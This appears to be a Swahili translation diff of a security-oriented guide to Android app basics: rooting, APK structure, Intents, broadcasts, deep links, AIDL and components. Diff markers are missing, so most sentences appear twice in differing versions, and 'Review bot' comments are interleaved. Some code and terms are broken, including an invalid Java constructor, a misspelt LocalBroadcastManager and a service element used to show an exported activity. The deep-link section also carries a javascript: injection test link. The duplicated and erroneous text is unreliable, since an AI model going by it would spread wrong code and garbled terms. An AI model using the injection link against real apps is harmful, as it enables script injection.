Baada ya binary ya su kusanidiwa, programu nyingine ya Android hutumiwa kuingiliana na binary ya `su` na **kutuma maombi ya ufikiaji wa msingi** kama **Msimamizi** na **SuperSU** (inapatikana kwenye duka la Google Play).
Mara tu faili ya su inapoanzishwa, ombi lingine la Android linatumika kuungana na faili ya `su` na **kusindika maombi ya ufikiaji wa root** kama **Superuser** na **SuperSU** (inapatikana kwenye duka la Google Play).
{% hint style="danger" %}
Tambua kwamba mchakato wa kuroot ni hatari sana na unaweza kuharibu vibaya kifaa
Kumbuka kwamba mchakato wa rooting ni hatari sana na unaweza kuharibu kifaa vibaya
{% endhint %}
### ROMs
Inawezekana **kubadilisha OS kwa kusanikisha firmware ya desturi**. Kufanya hivi inawezekana kupanua matumizi ya kifaa cha zamani, kuepuka vizuizi vya programu au kupata ufikiaji wa msimbo wa Android wa hivi karibuni.\
**OmniROM** na **LineageOS** ni moja ya firmware maarufu zaidi kutumia.
Inawezekana **kurekebisha OS kwa kusakinisha firmware maalum**. Kufanya hivi inawezekana kuongeza matumizi ya kifaa cha zamani, kupita vizuizi vya programu au kupata ufikiaji wa msimbo wa hivi karibuni wa Android.\
**OmniROM** na **LineageOS** ni mbili ya firmware maarufu zaidi za kutumia.
Tambua kwamba **sio lazima kila wakati kuroot kifaa** kusanikisha firmware ya desturi. **Baadhi ya watengenezaji huruhusu** kufungua bootloader zao kwa njia iliyodokezwa vizuri na salama.
Kumbuka kwamba **sio kila wakati ni lazima ku-root kifaa** ili kusakinisha firmware maalum. **Wakati wengine wa watengenezaji wanaruhusu** kufungua bootloaders zao kwa njia iliyoandikwa vizuri na salama.
### Matokeo
Maranyingi kifaa kikiroot, programu yoyote inaweza kuomba ufikiaji kama msingi. Ikiwa programu inayodhuru inapata, inaweza kupata ufikiaji wa karibu kila kitu na itaweza kuharibu simu.
Mara kifaa kinapokuwa kime-rooted, ombi lolote linaweza kuomba ufikiaji kama root. Ikiwa ombi la uhalifu litapata ufikiaji huo, linaweza kuwa na ufikiaji wa karibu kila kitu na linaweza kuharibu simu.
## Misingi ya Maombi ya Android <a href="#2-android-application-fundamentals" id="2-android-application-fundamentals"></a>
## Msingi wa Maombi ya Android <a href="#2-android-application-fundamentals" id="2-android-application-fundamentals"></a>
- Muundo wa maombi ya Android unaitwa _muundo wa faili wa APK_. Kimsingi ni **faili ya ZIP** (kwa kubadilisha kificho cha faili kuwa .zip, maudhui yanaweza kuchimbuliwa na kuonekana).
- Yaliyomo ya APK (Hayakamilishi)
- Muundo wa maombi ya Android unajulikana kama _muundo wa faili ya APK_. Kimsingi ni **faili ya ZIP** (kwa kubadilisha kiambishi cha faili kuwa .zip, yaliyomo yanaweza kutolewa na kuangaliwa).
- Yaliyomo ya APK (Siyo ya kina)
- **AndroidManifest.xml**
- resources.arsc/strings.xml
- resources.arsc: ina rasilimali zilizopangwa mapema, kama XML ya binary.
- resources.arsc: ina rasilimali zilizotayarishwa mapema, kama XML ya binary.
- res/xml/files\_paths.xml
- META-INF/
- Hapa ndipo Cheti lilipo!
- **classes.dex**
- Ina bytecode ya Dalvik, ikionyesha msimbo uliokompiliwa wa Java (au Kotlin) ambao programu inatekeleza kwa chaguo-msingi.
- Inashikilia bytecode ya Dalvik, inayoakisi msimbo wa Java (au Kotlin) uliotayarishwa ambao ombi linaendesha kwa default.
- lib/
- Ina maktaba za asili, zilizogawanywa kulingana na muundo wa CPU katika saraka za ndani.
- `armeabi`: msimbo kwa processors za msingi wa ARM
- `armeabi-v7a`: msimbo kwa processors za ARMv7 na zaidi
- `x86`: msimbo kwa processors za X86
- `mips`: msimbo kwa processors za MIPS pekee
- Inashikilia maktaba za asili, zilizogawanywa kwa usanifu wa CPU katika saraka ndogo.
- `armeabi`: msimbo wa processors za msingi wa ARM
- `armeabi-v7a`: msimbo wa processors za ARMv7 na juu
- `x86`: msimbo wa processors za X86
- `mips`: msimbo wa processors za MIPS pekee
- assets/
- Hifadhi faili mbalimbali zinazohitajika na programu, pamoja na maktaba za asili au faili za DEX zaidi, mara nyingi hutumiwa na waandishi wa programu hasidi kuficha msimbo zaidi.
- Inahifadhi faili mbalimbali zinazohitajika na ombi, huenda ikijumuisha maktaba za asili za ziada au faili za DEX, wakati mwingine hutumiwa na waandishi wa malware kuficha msimbo wa ziada.
- res/
- Ina rasilimali ambazo hazijakusanywa katika resources.arsc
- Inashikilia rasilimali ambazo hazijakusanywa katika resources.arsc
### **Dalvik & Smali**
Katika maendeleo ya Android, **Java au Kotlin** hutumiwa kuunda programu. Badala ya kutumia JVM kama katika programu za desktop, Android inakusanya nambari hii kuwa **Dalvik Executable (DEX) bytecode**. Zamani, mashine ya kawaida ya Dalvik ilishughulikia bytecode huu, lakini sasa, Android Runtime (ART) inachukua jukumu hili katika toleo jipya la Android.
Katika maendeleo ya Android, **Java au Kotlin** inatumika kwa kuunda maombi. Badala ya kutumia JVM kama katika maombi ya desktop, Android inakusanya msimbo huu kuwa **Dalvik Executable (DEX) bytecode**. Awali, mashine ya virtual ya Dalvik ilishughulikia bytecode hii, lakini sasa, Android Runtime (ART) inachukua jukumu hilo katika matoleo mapya ya Android.
Kwa uhandisi wa nyuma, **Smali** inakuwa muhimu. Ni toleo linaloweza kusomwa na binadamu la DEX bytecode, likifanya kazi kama lugha ya mkutano kwa kutafsiri nambari ya chanzo kuwa maagizo ya bytecode. Smali na baksmali hurejelea zana za mkutano na kufunga upya katika muktadha huu.
Kwa ajili ya uhandisi wa nyuma, **Smali** inakuwa muhimu. Ni toleo linaloweza kusomeka na binadamu la bytecode ya DEX, likifanya kazi kama lugha ya mkusanyiko kwa kutafsiri msimbo wa chanzo kuwa maagizo ya bytecode. Smali na baksmali zinarejelea zana za mkusanyiko na uondoshaji katika muktadha huu.
## Intents
Intents ni njia kuu ambayo programu za Android hutumia kuwasiliana kati ya vipengele vyao au na programu nyingine. Vitu hivi vya ujumbe pia vinaweza kubeba data kati ya programu au kipengele, kama jinsi maombi ya GET/POST yanavyotumiwa katika mawasiliano ya HTTP.
Intents ni njia kuu ambayo maombi ya Android yanawasiliana kati ya vipengele vyake au na maombi mengine. Hizi ni vitu vya ujumbe vinaweza pia kubeba data kati ya maombi au vipengele, sawa na jinsi maombi ya GET/POST yanavyotumika katika mawasiliano ya HTTP.
Kwa hivyo, Intent ni **ujumbe unaopitishwa kati ya vipengele**. Intents **zinaweza kuwa zimeelekezwa** kwa vipengele au programu maalum, **au zinaweza kutumwa bila mpokeaji maalum**.\
Hivyo, Intent kimsingi ni **ujumbe unaopita kati ya vipengele**. Intents **zinaweza kuelekezwa** kwa vipengele au maombi maalum, **au zinaweza kutumwa bila mpokeaji maalum**.\
Ili kuwa rahisi, Intent inaweza kutumika:
* Kuanza Shughuli, kwa kawaida kufungua kiolesura cha mtumiaji kwa programu
* Kama matangazo ya kuarifu mfumo na programu kuhusu mabadiliko
* Kuanza, kusitisha, na kuwasiliana na huduma ya nyuma
* Kupata data kupitia Watoaji wa Yaliyomo
* Kama maombi ya kurudi kushughulikia matukio
* Kuanzisha Activity, kwa kawaida kufungua kiolesura cha mtumiaji kwa ombi
* Kama matangazo ya kuarifu mfumo na maombi kuhusu mabadiliko
* Kuanzisha, kusitisha, na kuwasiliana na huduma ya nyuma
* Kupata data kupitia ContentProviders
* Kama kurudi nyuma kushughulikia matukio
Ikiwa ina kasoro, **Intents zinaweza kutumika kufanya aina mbalimbali za mashambulizi**.
Ikiwa kuna udhaifu, **Intents zinaweza kutumika kufanya mashambulizi mbalimbali**.
### Intent-Filter
### Kichujio cha Intent
**Intent Filters** hufafanua **jinsi shughuli, huduma, au Kipokeaji cha Matangazo kinaweza kuingiliana na aina tofauti za Intents**. Kimsingi, hufafanua uwezo wa vipengele hivi, kama vile vitendo wanavyoweza kutekeleza au aina za matangazo wanazoweza kusindika. Mahali kuu pa kutangaza vichungi hivi ni ndani ya faili ya **AndroidManifest.xml**, ingawa kwa Kipokeaji cha Matangazo, kuandika ni chaguo pia.
**Kichujio cha Intents** kinaelezea **jinsi shughuli, huduma, au Mpokeaji wa Matangazo unaweza kuingiliana na aina tofauti za Intents**. Kimsingi, zinaelezea uwezo wa vipengele hivi, kama vile ni vitendo gani wanaweza kufanya au aina gani za matangazo wanaweza kushughulikia. Mahali kuu pa kutangaza vichujio hivi ni ndani ya **faili ya AndroidManifest.xml**, ingawa kwa Mpokeaji wa Matangazo, kuandika ni chaguo pia.
Intent Filters zimeundwa na vikundi, vitendo, na vichungi vya data, na uwezekano wa kujumuisha metadata ya ziada. Hii inaruhusu vipengele kushughulikia Intents maalum ambazo zinalingana na vigezo vilivyotangazwa.
Vichujio vya Intents vinajumuisha makundi, vitendo, na vichujio vya data, huku kukiwa na uwezekano wa kujumuisha metadata ya ziada. Mpango huu unaruhusu vipengele kushughulikia Intents maalum zinazolingana na vigezo vilivyotangazwa.
Jambo muhimu la vipengele vya Android (shughuli/huduma/watoaji wa yaliyomo/Kipokeaji cha Matangazo) ni uonekano wao au **hali ya umma**. Kipengele kinachukuliwa kuwa cha umma na kinaweza kuingiliana na programu nyingine ikiwa kime **`exported`** na thamani ya **`true`** au ikiwa Kichungi cha Intent kimetangazwa kwa hiyo katika maelezo yake. Walakini, kuna njia kwa watengenezaji kudumisha vipengele hivi kuwa binafsi, kuhakikisha kuwa havichangiliani na programu nyingine kwa bahati mbaya. Hii inafanikiwa kwa kuweka sifa ya **`exported`** kuwa **`false`** katika ufafanuzi wao wa maelezo.
Sehemu muhimu ya vipengele vya Android (shughuli/huduma/watoa maudhui/mpokeaji wa matangazo) ni mwonekano wao au **hadhi ya umma**. Kipengele kinachukuliwa kuwa cha umma na kinaweza kuingiliana na maombi mengine ikiwa kime **`exported`** na thamani ya **`true`** au ikiwa kichujio cha Intent kimewekwa kwa ajili yake katika hati. Hata hivyo, kuna njia kwa waendelezaji kuweka vipengele hivi kuwa binafsi, kuhakikisha havihusiani na maombi mengine bila kukusudia. Hii inafanywa kwa kuweka **`exported`** attribute kuwa **`false`** katika ufafanuzi wao wa hati.
Zaidi ya hayo, watengenezaji wana chaguo la kuhakikisha upatikanaji wa vipengele hivi zaidi kwa kuhitaji ruhusa maalum. Sifa ya **`permission`** inaweza kuwekwa ili kuhakikisha kuwa ni programu zenye ruhusa iliyopewa tu ndizo zinaweza kupata kipengele, ikiongeza safu ya ziada ya usalama na udhibiti juu ya ni nani anaweza kuingiliana nacho.
Zaidi ya hayo, waendelezaji wana chaguo la kuimarisha ufikiaji wa vipengele hivi zaidi kwa kuhitaji ruhusa maalum. **`permission`** attribute inaweza kuwekwa ili kuhakikisha kwamba ni maombi tu yenye ruhusa iliyotolewa yanaweza kufikia kipengele, kuongeza safu ya ziada ya usalama na udhibiti juu ya nani anaweza kuingiliana nayo.
```java
<activity android:name=".MyActivity" android:exported="false">
<!-- Intent filters go here -->
</activity>
```
### Nia Zisizo Dhahiri
### Implicit Intents
Nia hutengenezwa kwa kutumia kujenga kwa programu kwa kutumia kujenga kwa Nia:
Intents huundwa kimaandishi kwa kutumia mjenzi wa Intent:
```java
Intent email = new Intent(Intent.ACTION_SEND, Uri.parse("mailto:"));
```
**Hatua** ya nia iliyotangazwa awali ni **ACTION\_SEND** na **Zaidi** ni mailto **Uri** (Zaidi ni habari ya ziada ambayo nia inatarajia).
The **Action** of the previously declared intent is **ACTION\_SEND** and the **Extra** is a mailto **Uri** (the Extra if the extra information the intent is expecting).
Nia hii inapaswa kutangazwa ndani ya mwonekano kama ilivyo katika mfano ufuatao:
Hii intent inapaswa kutangazwa ndani ya manifest kama katika mfano ufuatao:
```xml
<activity android:name="ShareActivity">
<intent-filter>
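Review bot: under the "Kawaida" (Normal) protection level, "Mtumiaji huhitajika kuidhinisha" now says the user is required to approve, reversing the previous "hahitajiki kuidhinisha" (is not required); normal permissions are granted without a user prompt, so this inverts the permission model the section describes and must be restored. Three smaller points in the same hunk: "kuomba ruhusa kwa njia ya kidijitali" ("digitally") should be "wakati wa utekelezaji" (at runtime) for dynamically requested permissions; "Mradi wa Msource wa Android" is garbled for the Android Open Source Project, so keep "AOSP (Android Open Source Project)"; and the sentence "The Action of the previously declared intent is ACTION_SEND and the Extra is a mailto Uri (the Extra if the extra information the intent is expecting)" is left in English with "if" where "is" is meant. The `<activity android:name=".MyActivity" android:exported="false">` snippet is fenced as java although it is manifest XML.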
@ -163,17 +165,17 @@ Nia hii inapaswa kutangazwa ndani ya mwonekano kama ilivyo katika mfano ufuatao:
</intent-filter>
</activity>
```
Intent-filter inahitaji kufanana na **action**, **data** na **category** ili kupokea ujumbe.
An intent-filter inahitaji kuendana na **action**, **data** na **category** ili kupokea ujumbe.
Mchakato wa "Uamuzi wa Intent" unahitaji kujua ni app gani itapokea ujumbe. Mchakato huu unazingatia **kipaumbele cha sifa**, ambacho kinaweza kuwekwa katika **tamko la intent-filter**, na **ile yenye kipaumbele kikubwa zaidi itachaguliwa**. Kipaumbele hiki kinaweza kuwekwa kati ya -1000 na 1000 na programu zinaweza kutumia thamani ya `SYSTEM_HIGH_PRIORITY`. Ikiwa **mgogoro** unatokea, dirisha la "choser" linaonekana ili **mtumiaji aweze kuchagua**.
Mchakato wa "Intent resolution" unamua ni programu ipi inapaswa kupokea kila ujumbe. Mchakato huu unazingatia **priority attribute**, ambayo inaweza kuwekwa katika **intent-filter declaration**, na **ile yenye kipaumbele cha juu itachaguliwa**. Kipaumbele hiki kinaweza kuwekwa kati ya -1000 na 1000 na programu zinaweza kutumia thamani ya `SYSTEM_HIGH_PRIORITY`. Ikiwa **conflict** itatokea, Dirisha la "choser" linaonekana ili **mtumiaji aweze kuamua**.
### Intents Dhahiri
### Explicit Intents
Intent dhahiri inabainisha jina la darasa inayolengwa:
Explicit intent inabainisha jina la darasa ambalo linawalenga:
```java
Intent downloadIntent = new (this, DownloadService.class):
```
Katika programu nyingine ili kupata upatikanaji wa nia iliyotangazwa awali unaweza kutumia:
Katika programu nyingine ili kufikia nia iliyotangazwa hapo awali unaweza kutumia:
```java
Intent intent = new Intent();
intent.setClassName("com.other.app", "com.other.app.ServiceName");
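Review bot: `Intent downloadIntent = new (this, DownloadService.class):` is not valid Java (no class name after `new`, and a colon instead of a semicolon); it is an unchanged context line, so the error is carried through the translation unnoticed. It should read `Intent downloadIntent = new Intent(this, DownloadService.class);`. Minor: "choser" in both versions of the intent-resolution paragraph should be "chooser", and `Dirisha` is capitalised mid-sentence in the new line.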
@ -181,30 +183,30 @@ context.startService(intent);
```
### Pending Intents
Hizi huruhusu programu zingine **kuchukua hatua kwa niaba ya programu yako**, ikatumia kitambulisho na ruhusa za programu yako. Kujenga Pending Intent ni lazima **itajwe nia na hatua ya kutekeleza**. Ikiwa **nia iliyotajwa si wazi** (haielezi ni nia gani inaweza kuipigia simu) programu mbaya inaweza kutekeleza **hatua iliyotajwa** kwa niaba ya programu ya mwathiriwa. Zaidi ya hayo, **ikiwa hatua haijatajwa**, programu mbaya itaweza kufanya **hatua yoyote kwa niaba ya mwathiriwa**.
Hizi zinawaruhusu programu nyingine **kuchukua hatua kwa niaba ya programu yako**, wakitumia utambulisho na ruhusa za programu yako. Kujenga Pending Intent inapaswa **kueleza intent na hatua ya kutekeleza**. Ikiwa **intent iliyotangazwa si ya Moja kwa Moja** (haijatangaza ni intent ipi inayoweza kuitwa) programu **mbaya inaweza kutekeleza hatua iliyotangazwa** kwa niaba ya programu ya mwathirika. Zaidi ya hayo, **ikiwa hatua haijatangazwa**, programu mbaya itakuwa na uwezo wa kufanya **hatua yoyote kwa niaba ya mwathirika**.
### Broadcast Intents
Tofauti na nia za awali, ambazo hupokelewa na programu moja tu, nia za matangazo **zinaweza kupokelewa na programu nyingi**. Hata hivyo, kuanzia toleo la API 14, ni **inawezekana kutaja programu inayopaswa kupokea** ujumbe kwa kutumia Intent.set Package.
Tofauti na intents za awali, ambazo zinapokelewa na programu moja tu, broadcast intents **zinaweza kupokelewa na programu nyingi**. Hata hivyo, kuanzia toleo la API 14, ni **mpossible kuweka programu ambayo inapaswa kupokea** ujumbe kwa kutumia Intent.setPackage.
Kwa kuongezea, ni pia inawezekana **kutaja ruhusa wakati wa kutuma matangazo**. Programu ya mpokeaji itahitaji kuwa na ruhusa hiyo.
Vinginevyo, pia inawezekana **kueleza ruhusa wakati wa kutuma matangazo**. Programu ya mpokeaji itahitaji kuwa na ruhusa hiyo.
Kuna **aina mbili** za Matangazo: **Kawaida** (isiyo ya moja kwa moja) na **Yaliyopangwa** (ya moja kwa moja). **Mpangilio** unategemea **kipaumbele kilichowekwa ndani ya mpokeaji**. **Kila programu inaweza kusindika, kusambaza au kudondosha Matangazo.**
Kuna **aina mbili** za Matangazo: **Kawaida** (asynchronous) na **Iliyopangwa** (synchronous). **Agizo** linategemea **kipaumbele kilichowekwa ndani ya kipengele cha mpokeaji**. **Kila programu inaweza kushughulikia, kupeleka au kuacha Matangazo.**
Inawezekana **kutuma** tangazo **kwa kutumia** kazi `sendBroadcast(nia, ruhusa ya mpokeaji)` kutoka darasa la `Context`.\
Unaweza pia kutumia kazi **`sendBroadcast`** kutoka kwa **`LocalBroadCastManager`** kuhakikisha **ujumbe hauondoki kamwe kwenye programu**. Kwa kutumia hii hata hautahitaji kuuza kipokeaji.
Inawezekana **kutuma** **matangazo** kwa kutumia kazi `sendBroadcast(intent, receiverPermission)` kutoka darasa la `Context`.\
Unaweza pia kutumia kazi **`sendBroadcast`** kutoka **`LocalBroadCastManager`** inahakikisha **ujumbe hauondoki kwenye programu**. Kwa kutumia hii hutahitaji hata kusafirisha kipengele cha mpokeaji.
### Matangazo ya Kudumu
### Sticky Broadcasts
Aina hii ya Matangazo **inaweza kupatikana muda mrefu baada ya kutumwa**.\
Hizi zilipitwa na wakati katika kiwango cha API 21 na **siyo kupendekezwa kuzitumia**.\
**Zinaruhusu programu yoyote kunusa data, lakini pia kuihariri.**
Aina hii ya Matangazo **inaweza kufikiwa muda mrefu baada ya kutumwa**.\
Hizi ziliondolewa katika kiwango cha API 21 na inashauriwa **usizitumie**.\
**Zinawaruhusu programu yoyote kunusa data, lakini pia kuibadilisha.**
Ikiwa unapata kazi zinazoleta neno "sticky" kama vile **`sendStickyBroadcast`** au **`sendStickyBroadcastAsUser`**, **angalia athari na jaribu kuziondoa**.
Ikiwa unapata kazi zenye neno "sticky" kama **`sendStickyBroadcast`** au **`sendStickyBroadcastAsUser`**, **angalia athari na jaribu kuziondoa**.
## Viungo vya Kina / Mipango ya URL
## Deep links / URL schemes
Katika programu za Android, **viungo vya kina** hutumiwa kuanzisha hatua (Nia) moja kwa moja kupitia URL. Hii hufanywa kwa kutangaza **mpango maalum wa URL** ndani ya shughuli. Wakati kifaa cha Android kinajaribu **kufikia URL na mpango huu**, shughuli iliyotajwa ndani ya programu inazinduliwa.
Katika programu za Android, **deep links** zinatumika kuanzisha hatua (Intent) moja kwa moja kupitia URL. Hii inafanywa kwa kutangaza **mpango maalum wa URL** ndani ya shughuli. Wakati kifaa cha Android kinapojaribu **kufikia URL yenye mpango huu**, shughuli iliyotangazwa ndani ya programu inazinduliwa.
Mpango lazima utangazwe katika faili ya **`AndroidManifest.xml`**:
```xml
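Review bot: `LocalBroadCastManager` (in both versions of the `sendBroadcast` paragraph) is not the real class name; it is `LocalBroadcastManager` (package `androidx.localbroadcastmanager.content`), and grepping a decompiled app for the misspelt name will find nothing. Since the paragraph recommends it as the way to keep broadcasts inside the app, it is also worth a sentence that AndroidX has deprecated this class in favour of in-process observers. Also the new line `ni **mpossible kuweka programu ambayo inapaswa kupokea** ujumbe` has a typo, "mpossible" for "inawezekana" (possible), which reads as the opposite of what is meant.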
@ -218,44 +220,44 @@ Mpango lazima utangazwe katika faili ya **`AndroidManifest.xml`**:
</intent-filter>
[...]
```
Schemu kutoka kwa mfano uliopita ni `exampleapp://` (pia kumbuka **`jamii BROWSABLE`**)
Mpango kutoka kwa mfano wa awali ni `exampleapp://` (zingatia pia **`category BROWSABLE`**)
Kisha, katika uga wa data, unaweza kufafanua **host** na **path**:
Kisha, katika uwanja wa data, unaweza kubainisha **host** na **path**:
```xml
<data android:scheme="examplescheme"
android:host="example"
/>
```
Kuipata kutoka kwenye wavuti ni rahisi kuweka kiungo kama:
Ili kuweza kufikia kutoka kwenye wavuti, inawezekana kuweka kiungo kama:
```xml
<a href="examplescheme://example/something">click here</a>
<a href="examplescheme://example/javascript://%250dalert(1)">click here</a>
```
Ili kupata **mimbo itakayotekelezwa kwenye Programu**, nenda kwenye shughuli iliyoitwa na kiungo cha kina na tafuta kazi ya **`onNewIntent`**.
Ili kupata **msimbo utakaotekelezwa katika App**, nenda kwenye shughuli inayoitwa na deeplink na tafuta kazi **`onNewIntent`**.
Jifunze jinsi ya [kuita viungo vya kina bila kutumia kurasa za HTML](./#exploiting-schemes-deep-links).
Jifunze jinsi ya [kuita deep links bila kutumia kurasa za HTML](./#exploiting-schemes-deep-links).
## AIDL - Lugha ya Ufafanuzi wa Interface ya Android
## AIDL - Android Interface Definition Language
**Lugha ya Ufafanuzi wa Interface ya Android (AIDL)** imeundwa kwa ajili ya kurahisisha mawasiliano kati ya mteja na huduma kwenye programu za Android kupitia **mawasiliano kati ya michakato** (IPC). Kwa kuwa kupata moja kwa moja kumbukumbu ya michakato mingine haikubaliki kwenye Android, AIDL inasahilisha mchakato kwa kubadilisha vitu kuwa muundo unaoeleweka na mfumo wa uendeshaji, hivyo kurahisisha mawasiliano kati ya michakato tofauti.
**Android Interface Definition Language (AIDL)** imeundwa ili kuwezesha mawasiliano kati ya mteja na huduma katika programu za Android kupitia **mawasiliano kati ya michakato** (IPC). Kwa kuwa upatikanaji wa kumbukumbu ya mchakato mwingine moja kwa moja haukubaliwi kwenye Android, AIDL inarahisisha mchakato kwa kuhamasisha vitu katika muundo unaoeleweka na mfumo wa uendeshaji, hivyo kurahisisha mawasiliano kati ya michakato tofauti.
### Dhana Kuu
### Mifano Muhimu
- **Huduma Zilizounganishwa**: Huduma hizi hutumia AIDL kwa IPC, kuruhusu shughuli au sehemu kuunganisha kwenye huduma, kutuma maombi, na kupokea majibu. Mbinu ya `onBind` kwenye darasa la huduma ni muhimu kwa kuanzisha mwingiliano, ikiiweka kama eneo muhimu sana la ukaguzi wa usalama kutafuta mapungufu.
- **Huduma Zilizofungwa**: Huduma hizi hutumia AIDL kwa IPC, zikiwezesha shughuli au vipengele kuungana na huduma, kufanya maombi, na kupokea majibu. Njia ya `onBind` katika darasa la huduma ni muhimu kwa kuanzisha mwingiliano, ikifanya kuwa eneo muhimu kwa ukaguzi wa usalama kutafuta udhaifu.
- **Mtume (Messenger)**: Kufanya kazi kama huduma iliyounganishwa, Mtume inarahisisha IPC kwa kuzingatia usindikaji wa data kupitia mbinu ya `onBind`. Ni muhimu kukagua mbinu hii kwa karibu kwa namna yoyote ya kushughulikia data kwa usalama au utekelezaji wa kazi nyeti.
- **Messenger**: Ikifanya kazi kama huduma iliyo fungwa, Messenger inarahisisha IPC kwa kuzingatia usindikaji wa data kupitia njia ya `onBind`. Ni muhimu kukagua njia hii kwa karibu kwa usimamizi usio salama wa data au utekelezaji wa kazi nyeti.
- **Kifungu (Binder)**: Ingawa matumizi moja kwa moja ya darasa la Binder ni nadra kutokana na ujumuishaji wa AIDL, ni faida kuelewa kuwa Binder hufanya kazi kama dereva wa kiwango cha kernel kurahisisha uhamishaji wa data kati ya nafasi za kumbukumbu za michakato tofauti. Kwa uelewa zaidi, rasilimali inapatikana kwenye [https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8).
- **Binder**: Ingawa matumizi ya moja kwa moja ya darasa la Binder si ya kawaida sana kutokana na ufafanuzi wa AIDL, ni muhimu kuelewa kwamba Binder inafanya kazi kama dereva wa kiwango cha kernel unawezesha uhamasishaji wa data kati ya maeneo ya kumbukumbu ya michakato tofauti. Kwa ufahamu zaidi, rasilimali inapatikana kwenye [https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8).
## Vipengele
Hivi ni pamoja na: **Shughuli (Activities), Huduma (Services), Wapokeaji wa Matangazo (Broadcast Receivers) na Watoaji (Providers).**
Hizi ni pamoja na: **Shughuli, Huduma, Vastika za Matangazo na Watoa Huduma.**
### Shughuli ya Kuzindua na shughuli nyingine
### Shughuli ya Kuanza na shughuli nyingine
Kwenye programu za Android, **shughuli (activities)** ni kama skrini, zikionyesha sehemu tofauti za interface ya mtumiaji wa programu. Programu inaweza kuwa na shughuli nyingi, kila moja ikiwasilisha skrini ya kipekee kwa mtumiaji.
Katika programu za Android, **shughuli** ni kama skrini, zikionyesha sehemu tofauti za kiolesura cha mtumiaji wa programu. Programu inaweza kuwa na shughuli nyingi, kila moja ikionyesha skrini ya kipekee kwa mtumiaji.
**Shughuli ya kuzindua (launcher activity)** ni lango kuu kwenye programu, inayoanzishwa unapobonyeza alama ya programu. Imedefiniwa kwenye faili ya maelezo ya programu na nia maalum za MAIN na LAUNCHER:
**Shughuli ya kuanza** ni lango kuu la programu, inayozinduliwa unapobofya ikoni ya programu. Imefafanuliwa katika faili ya manifest ya programu kwa nia maalum za MAIN na LAUNCHER:
```markup
<activity android:name=".LauncherActivity">
<intent-filter>
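Review bot: the new heading `### Mifano Muhimu` means "Important Examples" and is a regression from the replaced `### Dhana Kuu` ("Key Concepts"), which matched the English source; the bullets below it define concepts (Bound Services, Messenger, Binder), not examples. Likewise `Vastika za Matangazo` in the components line is not a Swahili term; the replaced `Wapokeaji wa Matangazo` (Broadcast Receivers) was correct and matches the later `### Broadcast Receivers` heading. The launcher-activity snippet is fenced as `markup`; `xml` would be consistent with the other manifest snippets.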
@ -264,19 +266,19 @@ Kwenye programu za Android, **shughuli (activities)** ni kama skrini, zikionyesh
</intent-filter>
</activity>
```
Haitaji shughuli ya kuzindua, hasa zile bila kiolesura cha mtumiaji, kama huduma za nyuma.
Sio programu zote zinahitaji shughuli ya kuzindua, hasa zile zisizo na kiolesura cha mtumiaji, kama huduma za nyuma.
Shughuli zinaweza kuwa zinapatikana kwa programu nyingine au michakato kwa kuziweka kama "zilizopatikana" kwenye hati ya maelekezo. Mipangilio hii inaruhusu programu nyingine kuanzisha shughuli hii:
Shughuli zinaweza kupatikana kwa programu nyingine au michakato kwa kuashiria kama "exported" katika hati. Mpangilio huu unaruhusu programu nyingine kuanzisha shughuli hii:
```markdown
<service android:name=".ExampleExportedService" android:exported="true"/>
```
Hata hivyo, kufikia shughuli kutoka kwa programu nyingine sio hatari ya usalama kila wakati. Wasiwasi unatokea ikiwa data nyeti inashirikishwa kwa njia isiyofaa, ambayo inaweza kusababisha kuvuja kwa habari.
Hata hivyo, kufikia shughuli kutoka programu nyingine si hatari ya usalama kila wakati. Wasiwasi unatokea ikiwa data nyeti inashirikiwa vibaya, ambayo inaweza kusababisha uvujaji wa taarifa.
**Mzunguko wa maisha ya shughuli** huanza na njia ya **onCreate**, kuweka UI na kujiandaa kwa shughuli kuingiliana na mtumiaji.
Mzunguko wa maisha wa shughuli **uanza na njia ya onCreate**, kuandaa UI na kuandaa shughuli kwa mwingiliano na mtumiaji.
### Darasa la Maombi
### Subclass ya Programu
Katika maendeleo ya Android, programu ina chaguo la kuunda **darasa la mshale** la [Maombi](https://developer.android.com/reference/android/app/Application) , ingawa sio lazima. Wakati darasa kama hilo la mshale linapofafanuliwa, linakuwa darasa la kwanza kuanzishwa ndani ya programu. Njia ya **`attachBaseContext`**, ikiwa imeanzishwa katika darasa hili la mshale, inatekelezwa kabla ya njia ya **`onCreate`**. Hii inaruhusu kuanzisha mapema kabla ya sehemu nyingine ya maombi kuanza.
Katika maendeleo ya Android, programu ina chaguo la kuunda **subclass** ya [Application](https://developer.android.com/reference/android/app/Application) darasa, ingawa si lazima. Wakati subclass kama hiyo imefafanuliwa, inakuwa darasa la kwanza kuanzishwa ndani ya programu. Njia ya **`attachBaseContext`**, ikiwa imeanzishwa katika subclass hii, inatekelezwa kabla ya njia ya **`onCreate`**. Mpangilio huu unaruhusu kuanzishwa mapema kabla ya sehemu nyingine ya programu kuanza.
```java
public class MyApp extends Application {
@Override
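Review bot: the snippet meant to illustrate an exported activity shows a service, `<service android:name=".ExampleExportedService" android:exported="true"/>`, inside a fence tagged `markdown`; it is an unchanged context line, so the mismatch survives the translation. The section is about activities, so the example should be an `<activity ... android:exported="true"/>` element (the identical service line already appears, correctly, under Services), and the fence should be `xml`.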
@ -292,35 +294,35 @@ super.onCreate();
}
}
```
### Huduma
### Services
[Huduma](https://developer.android.com/guide/components/services) ni **wafanyikazi wa nyuma** wenye uwezo wa kutekeleza kazi bila kiolesura cha mtumiaji. Kazi hizi zinaweza kuendelea kufanya kazi hata wakati watumiaji wanabadilisha programu tofauti, hivyo huduma ni muhimu kwa **shughuli ndefu**.
[Services](https://developer.android.com/guide/components/services) ni **operatives za nyuma** zinazoweza kutekeleza kazi bila kiolesura cha mtumiaji. Kazi hizi zinaweza kuendelea kukimbia hata watumiaji wanapobadilisha programu, na kufanya huduma kuwa muhimu kwa **operesheni za muda mrefu**.
Huduma ni za kubadilika; zinaweza kuanzishwa kwa njia mbalimbali, na **Intents** ikiwa njia kuu ya kuziendesha kama sehemu ya kuingia ya programu. Mara tu huduma inapoanzishwa kwa kutumia njia ya `startService`, mbinu yake ya `onStart` huanza kufanya kazi na kuendelea hadi mbinu ya `stopService` itakapoitwa kwa uwazi. Vinginevyo, ikiwa jukumu la huduma linategemea uhusiano wa mteja ulio hai, njia ya `bindService` hutumiwa kuunganisha mteja na huduma, ikishirikisha mbinu ya `onBind` kwa kupitisha data.
